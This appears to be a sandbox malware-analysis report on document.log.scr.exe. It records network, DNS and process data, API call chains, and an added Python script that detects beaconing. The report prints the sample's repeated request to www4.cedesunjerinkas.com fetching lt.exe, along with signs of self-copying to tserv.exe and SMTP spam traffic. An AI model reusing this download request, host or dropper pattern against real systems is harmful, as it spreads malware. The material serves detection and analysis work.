                                                                Oct 31, 2024 15:28:04.322489977 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.322583914 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.336560965 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.336817980 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.341581106 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.341936111 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.471807957 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.476638079 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.476758003 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.480755091 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.482383966 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:28:04.485833883 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.485924006 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.488432884 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.492134094 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:04.494473934 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.497014999 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:06.951163054 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:10.498394966 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:11.513684034 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:12.951625109 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:12.964895964 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.965051889 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.965197086 CET5002780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.969991922 CET8050027193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.976293087 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:12.976430893 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.976540089 CET5002880192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:12.981458902 CET8050028193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.078697920 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.083451986 CET8050036193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.083568096 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.083667994 CET5003680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.088459015 CET8050036193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.093728065 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.098571062 CET8050037193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.098695040 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.098790884 CET5003780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:28:13.103835106 CET8050037193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:13.529362917 CET5003425192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:13.967947960 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:15.982487917 CET5003525192.168.2.4142.251.9.27
                                                                Oct 31, 2024 15:28:17.529244900 CET5003425192.168.2.4142.250.153.26
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 15:26:27.227699041 CET5335153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.333014011 CET53533511.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.354674101 CET6416153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.363266945 CET53641611.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.588536978 CET5817853192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.595181942 CET53581781.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.662923098 CET5697453192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.670669079 CET53569741.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:27.933881044 CET6118153192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:27.967988968 CET53611811.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:26:46.287249088 CET5943953192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:26:46.294744968 CET53594391.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.852016926 CET5422553192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.858683109 CET53542251.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.889173031 CET6377053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.896532059 CET53637701.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.897433043 CET5178053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.904759884 CET53517801.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.905430079 CET5670253192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.912798882 CET53567021.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.913711071 CET6044053192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.921724081 CET53604401.1.1.1192.168.2.4
                                                                Oct 31, 2024 15:27:30.925535917 CET5525953192.168.2.41.1.1.1
                                                                Oct 31, 2024 15:27:30.932661057 CET53552591.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 15:26:27.227699041 CET | 192.168.2.4 | 1.1.1.1 | 0x1faf | Standard query (0) | yahoo.com | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:26:27.354674101 CET | 192.168.2.4 | 1.1.1.1 | 0x7ec1 | Standard query (0) | mta5.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.588536978 CET | 192.168.2.4 | 1.1.1.1 | 0x3d72 | Standard query (0) | mta7.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.662923098 CET | 192.168.2.4 | 1.1.1.1 | 0x1909 | Standard query (0) | mta6.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.933881044 CET | 192.168.2.4 | 1.1.1.1 | 0x57cc | Standard query (0) | www4.cedesunjerinkas.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:46.287249088 CET | 192.168.2.4 | 1.1.1.1 | 0x8baa | Standard query (0) | mta7.am0.yahoodns.net | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.852016926 CET | 192.168.2.4 | 1.1.1.1 | 0x5d7b | Standard query (0) | gmail.com | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.889173031 CET | 192.168.2.4 | 1.1.1.1 | 0x38d1 | Standard query (0) | alt2.gmail-smtp-in.l.google.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.897433043 CET | 192.168.2.4 | 1.1.1.1 | 0xa51d | Standard query (0) | alt4.gmail-smtp-in.l.google.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.905430079 CET | 192.168.2.4 | 1.1.1.1 | 0x9fa4 | Standard query (0) | alt3.gmail-smtp-in.l.google.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.913711071 CET | 192.168.2.4 | 1.1.1.1 | 0x7217 | Standard query (0) | alt1.gmail-smtp-in.l.google.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.925535917 CET | 192.168.2.4 | 1.1.1.1 | 0x34f | Standard query (0) | gmail-smtp-in.l.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 15:26:27.333014011 CET | 1.1.1.1 | 192.168.2.4 | 0x1faf | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:26:27.333014011 CET | 1.1.1.1 | 192.168.2.4 | 0x1faf | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:26:27.333014011 CET | 1.1.1.1 | 192.168.2.4 | 0x1faf | No error (0) | yahoo.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:26:27.363266945 CET | 1.1.1.1 | 192.168.2.4 | 0x7ec1 | No error (0) | mta5.am0.yahoodns.net | | 67.195.228.94, 98.136.96.91, 67.195.204.79, 67.195.204.74, 67.195.228.106, 98.136.96.74, 67.195.204.73, 67.195.228.110 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.595181942 CET | 1.1.1.1 | 192.168.2.4 | 0x3d72 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.77, 67.195.228.111, 98.136.96.91, 67.195.204.79, 67.195.204.72, 98.136.96.75, 67.195.228.110, 67.195.228.94 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.670669079 CET | 1.1.1.1 | 192.168.2.4 | 0x1909 | No error (0) | mta6.am0.yahoodns.net | | 98.136.96.75, 67.195.204.72, 67.195.204.73, 67.195.228.106, 98.136.96.74, 67.195.228.110, 98.136.96.77, 98.136.96.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:27.967988968 CET | 1.1.1.1 | 192.168.2.4 | 0x57cc | No error (0) | www4.cedesunjerinkas.com | | 193.166.255.171 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:26:46.294744968 CET | 1.1.1.1 | 192.168.2.4 | 0x8baa | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.77, 67.195.204.79, 67.195.228.109, 67.195.204.73, 98.136.96.77, 67.195.228.106, 67.195.228.94, 98.136.96.74 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.858683109 CET | 1.1.1.1 | 192.168.2.4 | 0x5d7b | No error (0) | gmail.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.858683109 CET | 1.1.1.1 | 192.168.2.4 | 0x5d7b | No error (0) | gmail.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.858683109 CET | 1.1.1.1 | 192.168.2.4 | 0x5d7b | No error (0) | gmail.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.858683109 CET | 1.1.1.1 | 192.168.2.4 | 0x5d7b | No error (0) | gmail.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.858683109 CET | 1.1.1.1 | 192.168.2.4 | 0x5d7b | No error (0) | gmail.com | | | MX (Mail exchange) | IN (0x0001) | false
Oct 31, 2024 15:27:30.896532059 CET | 1.1.1.1 | 192.168.2.4 | 0x38d1 | No error (0) | alt2.gmail-smtp-in.l.google.com | | 142.251.9.27 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.904759884 CET | 1.1.1.1 | 192.168.2.4 | 0xa51d | No error (0) | alt4.gmail-smtp-in.l.google.com | | 74.125.200.27 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.912798882 CET | 1.1.1.1 | 192.168.2.4 | 0x9fa4 | No error (0) | alt3.gmail-smtp-in.l.google.com | | 142.251.1.26 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.921724081 CET | 1.1.1.1 | 192.168.2.4 | 0x7217 | No error (0) | alt1.gmail-smtp-in.l.google.com | | 142.250.153.26 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 15:27:30.932661057 CET | 1.1.1.1 | 192.168.2.4 | 0x34f | No error (0) | gmail-smtp-in.l.google.com | | 74.125.206.27 | A (IP address) | IN (0x0001) | false
                                                                • www4.cedesunjerinkas.com
All 25 sessions to this host share the same endpoints, process and request; the fields that never change are listed once:

Source IP: 192.168.2.4
Destination IP: 193.166.255.171
Destination Port: 80
Process: C:\Windows\tserv.exe
Bytes transferred: 64 per session
Direction: OUT (only the outbound request is recorded; no response data appears in any session)
Data:
GET /chr/wtb/lt.exe HTTP/1.1
Host: www4.cedesunjerinkas.com

Per-session fields (all timestamps Oct 31, 2024, CET):

Session ID | Source Port | PID  | Timestamp
0          | 49731       | 4192 | 15:26:28.065036058
1          | 49733       | 4192 | 15:26:29.076679945
2          | 49739       | 4192 | 15:26:37.697303057
3          | 49741       | 4192 | 15:26:46.332851887
4          | 49742       | 2256 | 15:26:46.335863113
5          | 49744       | 2256 | 15:26:54.958703995
6          | 49745       | 4192 | 15:26:54.973681927
7          | 49746       | 2256 | 15:27:03.552293062
8          | 49747       | 4192 | 15:27:03.583918095
9          | 49762       | 2256 | 15:27:12.280694008
10         | 49763       | 4192 | 15:27:12.280836105
11         | 49807       | 2256 | 15:27:20.884182930
12         | 49808       | 4192 | 15:27:20.884277105
13         | 49849       | 2256 | 15:27:29.474132061
14         | 49850       | 4192 | 15:27:29.489686966
15         | 49894       | 2256 | 15:27:38.541481972
16         | 49896       | 4192 | 15:27:38.542469025
17         | 49936       | 4192 | 15:27:47.207947016
18         | 49937       | 2256 | 15:27:47.208086967
19         | 49981       | 4192 | 15:27:55.833419085
20         | 49982       | 2256 | 15:27:55.833657980
21         | 50027       | 4192 | 15:28:04.488432884
22         | 50028       | 2256 | 15:28:04.492134094
23         | 50036       | 4192 | 15:28:13.083667994
24         | 50037       | 2256 | 15:28:13.098790884

Two tserv.exe processes (PID 4192 from session 0, PID 2256 joining at session 4) poll the same URL on a fixed cadence of roughly 8.6 seconds each, within milliseconds of one another. The 64-byte request consists of the GET line, the Host header and the terminating blank line only; no User-Agent or other header is sent.
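The polling pattern in the table above is the kind of thing a detection engineer would want to measure rather than eyeball. The script below is an added example, not part of the Joe Sandbox report: it computes per-PID request intervals from the timestamps transcribed from the table, scores them for beaconing with a robust median/MAD statistic (so the one-second retry at the start of PID 4192's series does not skew the result), and parses the captured request to confirm that it carries no User-Agent and that its length matches the report's 64 bytes. The thresholds (at least 5 requests, jitter below 10% of the median interval) are assumptions chosen for this example.

```python
"""Beacon-interval and request-shape checks over the tserv.exe HTTP sessions.

Added example; not code from the report or the sample. The session tuples
below are transcribed from the session table for www4.cedesunjerinkas.com;
the detection thresholds are assumptions for illustration.
"""
from statistics import median

# (session id, source port, pid, timestamp) transcribed from the report table.
SESSIONS = [
    (0, 49731, 4192, "15:26:28.065036058"), (1, 49733, 4192, "15:26:29.076679945"),
    (2, 49739, 4192, "15:26:37.697303057"), (3, 49741, 4192, "15:26:46.332851887"),
    (4, 49742, 2256, "15:26:46.335863113"), (5, 49744, 2256, "15:26:54.958703995"),
    (6, 49745, 4192, "15:26:54.973681927"), (7, 49746, 2256, "15:27:03.552293062"),
    (8, 49747, 4192, "15:27:03.583918095"), (9, 49762, 2256, "15:27:12.280694008"),
    (10, 49763, 4192, "15:27:12.280836105"), (11, 49807, 2256, "15:27:20.884182930"),
    (12, 49808, 4192, "15:27:20.884277105"), (13, 49849, 2256, "15:27:29.474132061"),
    (14, 49850, 4192, "15:27:29.489686966"), (15, 49894, 2256, "15:27:38.541481972"),
    (16, 49896, 4192, "15:27:38.542469025"), (17, 49936, 4192, "15:27:47.207947016"),
    (18, 49937, 2256, "15:27:47.208086967"), (19, 49981, 4192, "15:27:55.833419085"),
    (20, 49982, 2256, "15:27:55.833657980"), (21, 50027, 4192, "15:28:04.488432884"),
    (22, 50028, 2256, "15:28:04.492134094"), (23, 50036, 4192, "15:28:13.083667994"),
    (24, 50037, 2256, "15:28:13.098790884"),
]

# The request body the report shows for every session, reconstructed on the
# wire with CRLF line endings and the terminating blank line.
RAW_REQUEST = (
    b"GET /chr/wtb/lt.exe HTTP/1.1\r\n"
    b"Host: www4.cedesunjerinkas.com\r\n"
    b"\r\n"
)


def _seconds(ts: str) -> float:
    """Convert 'HH:MM:SS.fraction' to seconds, keeping the report's nanosecond digits."""
    hms, frac = ts.split(".")
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s + int(frac) / 10 ** len(frac)


def intervals_by_pid(sessions):
    """Map pid -> list of gaps (seconds) between its consecutive requests."""
    by_pid = {}
    for _sid, _port, pid, ts in sorted(sessions, key=lambda r: r[3]):
        by_pid.setdefault(pid, []).append(_seconds(ts))
    return {pid: [b - a for a, b in zip(t, t[1:])] for pid, t in by_pid.items()}


def beacon_score(deltas):
    """Return (median interval, MAD / median). MAD is robust to a single outlier
    such as the 1-second retry that opens PID 4192's series."""
    med = median(deltas)
    mad = median(abs(d - med) for d in deltas)
    return med, mad / med


def find_beacons(sessions, min_requests=5, max_jitter=0.1):
    """Return {pid: (median_interval, jitter)} for PIDs whose polling is regular
    enough to look like a beacon. Thresholds are assumptions, not report values."""
    hits = {}
    for pid, deltas in intervals_by_pid(sessions).items():
        if len(deltas) + 1 < min_requests:
            continue
        med, jitter = beacon_score(deltas)
        if jitter <= max_jitter:
            hits[pid] = (round(med, 2), round(jitter, 4))
    return hits


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, {header-name: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers


def request_anomalies(raw: bytes, expected_len=None):
    """Flags a triager would want on a request like this one."""
    req_line, headers = parse_request(raw)
    path = req_line.split()[1]
    flags = []
    if "user-agent" not in headers:
        flags.append("no User-Agent header")
    if set(headers) == {"host"}:
        flags.append("Host is the only header")
    if path.lower().endswith(".exe"):
        flags.append("requests a .exe by path")
    if expected_len is not None and len(raw) != expected_len:
        flags.append(f"length {len(raw)} != expected {expected_len} bytes")
    return flags


if __name__ == "__main__":
    print("beacons:", find_beacons(SESSIONS))
    print("request flags:", request_anomalies(RAW_REQUEST, expected_len=64))
```

Both tserv.exe PIDs come out with a median interval just under 8.7 seconds and jitter well under 1%, and the reconstructed request is exactly 64 bytes, which is how you confirm from the table alone that nothing beyond the GET line and Host header crossed the wire.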
Target ID: 0
Start time: 10:26:10
Start date: 31/10/2024
Path: C:\Users\user\Desktop\document.log.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\document.log.scr.exe"
Imagebase: 0x400000
File size: 423'046 bytes
MD5 hash: 203E91D369913B5768296E416B0C86D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:26:16
Start date: 31/10/2024
Path: C:\Windows\tserv.exe
Wow64 process (32bit): true
Commandline: C:\Windows\tserv.exe s
Imagebase: 0x400000
File size: 423'046 bytes
MD5 hash: 203E91D369913B5768296E416B0C86D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 95%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 2
Start time: 10:26:16
Start date: 31/10/2024
Path: C:\Windows\SysWOW64\notepad.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp
Imagebase: 0x1a0000
File size: 165'888 bytes
MD5 hash: E92D3A824A0578A50D2DD81B5060145F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 10:26:35
Start date: 31/10/2024
Path: C:\Windows\tserv.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\tserv.exe" s
Imagebase: 0x400000
File size: 423'046 bytes
MD5 hash: 203E91D369913B5768296E416B0C86D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: false
Execution Graph

Execution Coverage: 4.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16%
Total number of Nodes: 2000
Total number of Limit Nodes: 46

execution_graph (interactive node map; the dump is truncated at node 13112. The API chains recoverable from it are summarised below, keyed by the graph's own node addresses):

40c1d0: GetTickCount, GetTickCount, GetTickCount, GetTickCount (reached from 40e246 and 40de56; followed by 4028a0 "42 API calls" and 424873 _fast_error_exit)
420ad0: GetProcessHeap, HeapAlloc, RegOpenKeyExA; 420f04 RegQueryValueExA; 420f40 RegCloseKey, RegOpenKeyExA; 420f69 RegQueryValueExA; GetLastError on each failure branch; 42cfce "61 API calls"; 42108e GetProcessHeap, HeapFree, RegCloseKey
41fb79: GetProcessHeap, HeapAlloc, RegOpenKeyExA; 41fc29 RegQueryValueExA; 41fcdd GetProcessHeap, HeapFree, RegCloseKey
423260 (via 42d570 -> 41e3a0 -> 41e450): GetProcessHeap, HeapAlloc, then HeapAlloc at 4232d3, 423306, 423344, 42336e, 42339f (HeapFree on each failure branch); 4233df InitializeSecurityDescriptor; 42340b GetCurrentProcess, OpenProcessToken; GetTokenInformation at 42342a, 42344c, 42346c; 423496 SetSecurityDescriptorOwner; 4234b9 SetSecurityDescriptorGroup; three rounds of AllocateAndInitializeSid followed by GetLengthSid, AddAce (4234ce/423507, 4235b6/423609, 4236cd/42371e); 423799 IsValidSecurityDescriptor
41ee5f: CreateEventA x5, then 4237e0 GetVersionExA, then 424873 _fast_error_exit
426572: GetModuleFileNameA; 42658c _strcat, _strncpy, _strlen; 42add1/42ade4 LoadLibraryA, then GetProcAddress at 42adf9, 42ae10 (x2), 42ae33, 42ae44
429190: GetModuleHandleA; 42919f GetProcAddress; 4291b5 ExitProcess
425d91 onward, CRT start-up: 425da9 GetVersionExA; 425df1 GetModuleHandleA; 42846f HeapCreate (HeapDestroy on failure); 427131 GetModuleHandleA, 427144 GetProcAddress x4, 4271af FlsAlloc, 4271da FlsSetValue, GetCurrentThreadId; 42aba0 GetStartupInfoA, 42acd2 GetStdHandle, 42ace0 GetFileType, 42ad33 SetHandleCount; 425e96 GetCommandLineA; 42aa45 GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW (fallback 42ab00 GetEnvironmentStrings, FreeEnvironmentStringsA); 42a99e GetModuleFileNameA; 425ee3 GetStartupInfoA; 425ef5 GetModuleHandleA, then entry into 415060; the remaining nodes are the __lock, __getbuf, ___initmbctable, ___free_lc_time, ___sbh_resize_block and _fast_error_exit helpers (HeapAlloc/HeapReAlloc/HeapFree, VirtualAlloc/VirtualFree, EnterCriticalSection/LeaveCriticalSection, FlsGetValue/FlsSetValue, GetStdHandle, WriteFile, GetCurrentProcess, TerminateProcess)
415060 (called from CRT start-up, i.e. the sample's own main routine): 41509c GetModuleFileNameA; 41514f ExpandEnvironmentStringsA, CopyFileA; 4152c5 lstrcpyA, lstrcatA, CreateProcessA; 415342 CloseHandle, CloseHandle; alternative branch 4122f0 GetModuleFileNameA, CreateFileA, then 415379 Sleep or 412620 GetCurrentDirectoryA, GetTempFileNameA; further sub-routines at 4129c0, 41c660, 413ad0, 412fc0 (dump ends at 13112 424873)

The copy-then-launch chain under 415060 (expand a path, CopyFileA, build a command line, CreateProcessA) is consistent with the C:\Windows\tserv.exe drop and the "tserv.exe s" launch recorded in the process list above, and the GetTempFileNameA branch with the 2BF7.tmp file handed to notepad.exe.
_fast_error_exit 36 API calls 13115 415371 13112->13115 13113->13113 13116 41556c MessageBoxA 13113->13116 13115->12982 13116->13083 13119 415112 13454 413dd0 13119->13454 13133 429254 _fast_error_exit 36 API calls 13132->13133 13134 429324 13133->13134 13134->12983 13136 425d76 13135->13136 13137 425d7b 13135->13137 13138 42a55a _fast_error_exit 36 API calls 13136->13138 13139 42a3e3 _fast_error_exit 36 API calls 13137->13139 13138->13137 13140 425d84 13139->13140 13141 429190 _fast_error_exit 3 API calls 13140->13141 13142 425d8e 13141->13142 13142->12952 13144 429254 _fast_error_exit 36 API calls 13143->13144 13145 429344 13144->13145 13145->12986 13147 4284a8 13146->13147 13147->12991 13147->12994 13149 427441 13148->13149 13150 42b4df __lock 2 API calls 13149->13150 13151 427125 13149->13151 13150->13149 13151->12998 13151->12999 13153 426f55 FlsFree 13152->13153 13157 426f63 13152->13157 13153->13157 13154 42749b DeleteCriticalSection 13156 4255be ___free_lc_time 36 API calls 13154->13156 13155 4274b3 13158 4274c5 DeleteCriticalSection 13155->13158 13159 42712e 13155->13159 13156->13157 13157->13154 13157->13155 13158->13155 13159->12955 13161 42b4a2 13160->13161 13163 42b4a9 13160->13163 13164 42b349 13161->13164 13163->13055 13165 42b355 ___initmbctable 13164->13165 13166 42758b __lock 36 API calls 13165->13166 13167 42b360 13166->13167 13168 42b386 13167->13168 13169 42b374 GetOEMCP 13167->13169 13170 42b39d 13168->13170 13171 42b38b GetACP 13168->13171 13169->13170 13173 4263b4 __getbuf 36 API calls 13170->13173 13174 42b3db 13170->13174 13178 42b478 13170->13178 13171->13170 13173->13174 13179 42b3ed 13174->13179 13180 42b1b9 13174->13180 13175 42b487 ___initmbctable 13175->13163 13177 4255be ___free_lc_time 36 API calls 13177->13178 13188 42b490 13178->13188 13179->13177 13179->13178 13181 42b1d7 13180->13181 13187 42b202 ___initmbctable 13180->13187 13182 42b1ee GetCPInfo 13181->13182 13181->13187 13182->13187 13184 42b335 13185 424873 _fast_error_exit 
36 API calls 13184->13185 13186 42b347 13185->13186 13186->13179 13187->13184 13191 42b02d GetCPInfo 13187->13191 13327 4274d6 LeaveCriticalSection 13188->13327 13190 42b497 13190->13175 13192 42b11f 13191->13192 13193 42b05d 13191->13193 13196 424873 _fast_error_exit 36 API calls 13192->13196 13201 42b56a 13193->13201 13195 42b0d3 13224 42a027 13195->13224 13198 42b1b7 13196->13198 13198->13184 13199 42b0f7 13200 42a027 ___initmbctable 61 API calls 13199->13200 13200->13192 13202 42b576 ___initmbctable 13201->13202 13203 42b580 GetStringTypeW 13202->13203 13206 42b598 13202->13206 13204 42b5a0 GetLastError 13203->13204 13203->13206 13204->13206 13205 42b6ad 13268 42c8b2 GetLocaleInfoA 13205->13268 13206->13205 13207 42b5cb 13206->13207 13209 42b5e7 MultiByteToWideChar 13207->13209 13211 42b6a7 ___initmbctable 13207->13211 13209->13211 13218 42b615 ___initmbctable _fast_error_exit 13209->13218 13211->13195 13212 42b6f9 GetStringTypeA 13212->13211 13214 42b712 13212->13214 13215 4255be ___free_lc_time 36 API calls 13214->13215 13215->13211 13216 42b6ed 13216->13211 13216->13212 13217 42b673 MultiByteToWideChar 13220 42b68a GetStringTypeW 13217->13220 13221 42b69b 13217->13221 13218->13217 13219 42af1a __lock 36 API calls 13218->13219 13222 42b664 13219->13222 13220->13221 13221->13211 13223 4255be ___free_lc_time 36 API calls 13221->13223 13222->13211 13222->13217 13223->13211 13225 42a033 ___initmbctable 13224->13225 13226 42a03d LCMapStringW 13225->13226 13229 42a058 13225->13229 13227 42a060 GetLastError 13226->13227 13226->13229 13227->13229 13228 42a27f 13231 42c8b2 ___initmbctable 50 API calls 13228->13231 13229->13228 13230 42a0ab 13229->13230 13232 42a0cc MultiByteToWideChar 13230->13232 13234 42a277 ___initmbctable 13230->13234 13233 42a2a9 13231->13233 13232->13234 13237 42a0fa _fast_error_exit 13232->13237 13233->13234 13235 42a2c2 13233->13235 13236 42a3b0 LCMapStringA 13233->13236 13234->13199 13239 42c8f5 ___initmbctable 43 API calls 13235->13239 13238 
42a3ad 13236->13238 13240 42a159 MultiByteToWideChar 13237->13240 13242 4263b4 __getbuf 36 API calls 13237->13242 13238->13234 13245 4255be ___free_lc_time 36 API calls 13238->13245 13241 42a2d4 13239->13241 13243 42a176 LCMapStringW 13240->13243 13244 42a25c 13240->13244 13241->13234 13246 42a2de LCMapStringA 13241->13246 13247 42a146 13242->13247 13243->13244 13248 42a195 13243->13248 13249 42a269 13244->13249 13252 4255be ___free_lc_time 36 API calls 13244->13252 13245->13234 13250 42a378 13246->13250 13260 42a2fd ___initmbctable _fast_error_exit 13246->13260 13247->13234 13247->13240 13251 42a19b 13248->13251 13256 42a1c8 _fast_error_exit 13248->13256 13249->13234 13253 4255be ___free_lc_time 36 API calls 13249->13253 13250->13238 13254 4255be ___free_lc_time 36 API calls 13250->13254 13251->13244 13255 42a1ad LCMapStringW 13251->13255 13252->13249 13253->13234 13254->13238 13255->13244 13257 42a223 LCMapStringW 13256->13257 13258 4263b4 __getbuf 36 API calls 13256->13258 13257->13244 13261 42a23b WideCharToMultiByte 13257->13261 13262 42a214 13258->13262 13259 42a35b LCMapStringA 13259->13250 13264 42a37c 13259->13264 13260->13259 13263 4263b4 __getbuf 36 API calls 13260->13263 13261->13244 13262->13244 13262->13257 13267 42a340 ___initmbctable 13263->13267 13266 42c8f5 ___initmbctable 43 API calls 13264->13266 13266->13250 13267->13250 13267->13259 13269 42c8e1 13268->13269 13270 42c8dc 13268->13270 13300 4259c0 13269->13300 13272 424873 _fast_error_exit 36 API calls 13270->13272 13273 42b6cd 13272->13273 13273->13211 13273->13212 13274 42c8f5 13273->13274 13275 42c901 ___initmbctable 13274->13275 13276 42c928 GetCPInfo 13275->13276 13292 42ca38 13275->13292 13277 42c939 13276->13277 13283 42c94c _strlen 13276->13283 13278 42c93f GetCPInfo 13277->13278 13277->13283 13278->13283 13279 4255be ___free_lc_time 36 API calls 13280 42c9f2 13279->13280 13282 424873 _fast_error_exit 36 API calls 13280->13282 13281 42c980 MultiByteToWideChar 13281->13280 13285 42c99a 
